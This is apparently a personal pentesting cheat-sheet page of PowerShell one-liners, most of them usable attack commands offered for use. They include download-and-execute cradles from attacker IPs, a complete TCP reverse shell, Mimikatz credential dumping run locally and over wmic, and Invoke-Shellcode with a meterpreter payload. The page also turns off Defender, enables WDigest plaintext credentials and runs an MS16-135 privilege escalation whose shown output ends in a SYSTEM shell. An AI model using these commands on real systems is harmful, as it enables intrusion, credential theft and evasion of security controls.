Welkom bij Puckiestyle.nl

Groetjes Puck

powershell oneliners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')

Full documentation here.

PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>  

Full documentation here.

PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks"
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"                    PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"                                       PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true

PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true

change claire password to Password!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (don’t need Admin for that)

Get-Item WSMan:\localhost\Client\TrustedHosts
.
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public> import-module ./Invoke-MS16135.ps1 
PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
_____ _____ ___ ___ ___ ___ ___ 
| | __|_ | | _|___|_ | |_ | _|
| | | |__ |_| |_| . |___|_| |_|_ |_ |
|_|_|_|_____|_____|___| |_____|___|___|

[by b33f -> @FuzzySec]


[!] Success, spawning a system shell! 

root@kali:~/htb# nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

Execute aboves cmdlets as Administrator in Powershell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp


ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco>
:)